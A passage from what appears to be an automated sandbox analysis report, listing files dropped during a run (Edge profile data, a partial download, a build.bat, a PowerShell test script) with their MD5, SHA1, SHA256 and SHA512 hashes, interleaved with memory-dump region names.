| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ae54e9db2e89f2c54da8cc0bfcbd26bd |
| SHA1 | a88af6c673609ecbc51a1a60dfbc8577830d2b5d |
| SHA256 | 5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af |
| SHA512 | e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | be55b01d32a32c10adccacc5c3de46fb |
| SHA1 | 953d5ca4af471d9becdc52142c4ebb0f74b5f1b4 |
| SHA256 | 77fe1ac124df6c12e2c6261169f1fc13eb00fb01cddebf8159e7553a873599cb |
| SHA512 | 1e10c7bc4f73c8affabcd1f7eaa4326568e3902b442e7afb10d980b5da8cd2f100a291cde692c4ed986e79f37cb19a70297b36c151eeca4f639bd4e8bf58f1bc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008
| MD5 | 3f0a3329015911236cf93c2b20ceb263 |
| SHA1 | 75d560d378e180108d86409b1bf8ecf63da04b90 |
| SHA256 | c097c93282fc1f37a00b96a9fd68a3e6a3d76177747a1bbbcd32495cc5f20e04 |
| SHA512 | d2849e06aeba4c125b1be57b0a688e00c326f651750c77dc2bf9967e944d0b7f550309498d4cd95819484a5c3b6d2352d5786f1595e040f6b0b058b5d94748f1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | bc89fdf3c6e9880def9bc2fefa989964 |
| SHA1 | 5d45023753df598592983be3d91b24f703bfa935 |
| SHA256 | 1f8e34e4cdc209366b96fe8ae7f1786ecefecbfbc013bae1dc54e98c357ea1e1 |
| SHA512 | fce9ca8060c42cede7f7fc1589d7baa8e1b5b67121e2fa538fa1d7b284aae23cf876f90b8e46d923674a2d46f477c60816df4e2a291b110f81bbcb2a45285c8a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 00eec21094d242b22159e46c6d9ebc85 |
| SHA1 | 1c9bd2a9a9c99b02b7c4774ece931502c667b556 |
| SHA256 | b5e0924974c845207e45547da269a3799acdf75b2a3da5fcd7e4c00d6282c34b |
| SHA512 | 0ccf1068ee7c4d676e8f995bae08e518df3f1fff228a2095c0b84adad942c43e49ff68b9d103d6611eda92438c4666263043d3062181e680979153f2c6acb523 |
C:\Users\Admin\Downloads\Unconfirmed 257470.crdownload
| MD5 | bc29cf6918f718b7be09265b9e6cb781 |
| SHA1 | ddc85bd70fb6b9dd5ab8c2f3b54c557e753bfc76 |
| SHA256 | 89e2b8dc769fa711029c49cb2d1bf9664eb587363fb1b49c71fd2f180c47a0d3 |
| SHA512 | 993dd8d859cd0db05c558fc5ac4bd7f41f701e804702b495b7c9e9eeeefea83805ad6f04dbaba8c83f319b0da23f72973179c7651123e5af6a6289fbefb0ad8a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 08a6af048eb4984d29f8db934c70e7a2 |
| SHA1 | cf9a00fa95cad157226b68ef71ecd5449840dfad |
| SHA256 | 4b4c9b4a54fa15634edaad3b0a89961506c56e8a24972c8a44b4692d516e9f4f |
| SHA512 | e261a32bb540f5afcb3bd4098b4cae54fe484c28d02d019dcb82ef08743fdbbff66b07da744a3c49fa849561bf337b0e738e7c1aaffedd1ced85751afb6ce9e5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 980b399178f45be7eb209909855b7f98 |
| SHA1 | 7127f444be66bc1bef0b5ee9ac440b888bdbd6bb |
| SHA256 | 3c088b8f160e11e495e0c1708273e945672c910bb674d20e95d600014c81f2e2 |
| SHA512 | e5f28ec9c5e4fbdfbdede593bb7462e1324167b1c4e902b41cab3d2c318740ff514d4d86be25a3d6a6fd482c3630eebe3dd9d3fbeade2ffc8a0f73c6cfec2ab4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 425640eae92d08aea928c3c409b0d4f9 |
| SHA1 | 5d2713b795f3afb7a048e54ec869cd1d90420805 |
| SHA256 | ff08f105903c88e3f0420b58219d228ac4c6e3d301a70c670a9dca05c8d9429c |
| SHA512 | 774756ab79b0e863ac7cf0a9145def8872c3adf7a914b031bc2873807e24caa614e1497341e4b1b8272f9449ded2d144e0f6f0427ecab2029ee50459e7f73425 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat
| MD5 | 5c5713e43c05ee7799e65952fa73da13 |
| SHA1 | 24e836b9dd46f3d8e854476ff096780247792110 |
| SHA256 | 9bf4ec92fc8fb1402fbf8fd96cd3bbe3ab45abe230532c039cada26e68d84c98 |
| SHA512 | bcadc755697d4c72a8d7184f52d6cde3bf058aee171c844a27e988c39e71f683b1a0fc0f225b5b09adc9483d362586688c99d4d5a016ea209811c254d54d8746 |
memory/1428-209-0x0000000002AD0000-0x0000000002B06000-memory.dmp
memory/1428-210-0x00000000051D0000-0x00000000057F8000-memory.dmp
memory/1428-211-0x0000000005830000-0x0000000005852000-memory.dmp
memory/1428-212-0x00000000059D0000-0x0000000005A36000-memory.dmp
memory/1428-213-0x0000000005A40000-0x0000000005AA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1vnfsblm.gqa.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1428-223-0x0000000005B40000-0x0000000005E94000-memory.dmp
memory/1428-224-0x0000000005F90000-0x0000000005FAE000-memory.dmp
memory/1428-225-0x0000000005FD0000-0x000000000601C000-memory.dmp
memory/1428-226-0x00000000077E0000-0x0000000007E5A000-memory.dmp
memory/1428-227-0x0000000006590000-0x00000000065AA000-memory.dmp
memory/1428-228-0x0000000007170000-0x0000000007178000-memory.dmp
memory/1428-229-0x0000000007180000-0x00000000071B6000-memory.dmp
memory/1428-230-0x00000000071D0000-0x00000000071EE000-memory.dmp
memory/1428-231-0x0000000008480000-0x0000000008A98000-memory.dmp
memory/1428-232-0x00000000072A0000-0x00000000072B2000-memory.dmp
memory/1428-233-0x0000000007300000-0x000000000733C000-memory.dmp
memory/1428-234-0x0000000007480000-0x000000000758A000-memory.dmp
memory/888-247-0x0000000006C90000-0x0000000006CC6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 06ad34f9739c5159b4d92d702545bd49 |
| SHA1 | 9152a0d4f153f3f40f7e606be75f81b582ee0c17 |
| SHA256 | 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba |
| SHA512 | c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92 |
memory/4856-264-0x0000000006BD0000-0x0000000006C06000-memory.dmp
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
| MD5 | 9efea37008ee76b11d28d3a4ff7996ca |
| SHA1 | 47be8e730b434d97205efdbd2efa8e2f2fa229cf |
| SHA256 | 12eebc361efb15d612843f274d1122b8150a6d696b4d8e0a1891675f8db10345 |
| SHA512 | 42b9704dc8a0647104daebe201730c0d3677544167d7312ced6622895cbe39bfee42f4e2091692903e95bca788c0f50d9bbc21e5662dfc7b77e60069ea627cf5 |
memory/5604-288-0x000001CBC39E0000-0x000001CBC39E1000-memory.dmp
memory/5604-290-0x000001CBC39E0000-0x000001CBC39E1000-memory.dmp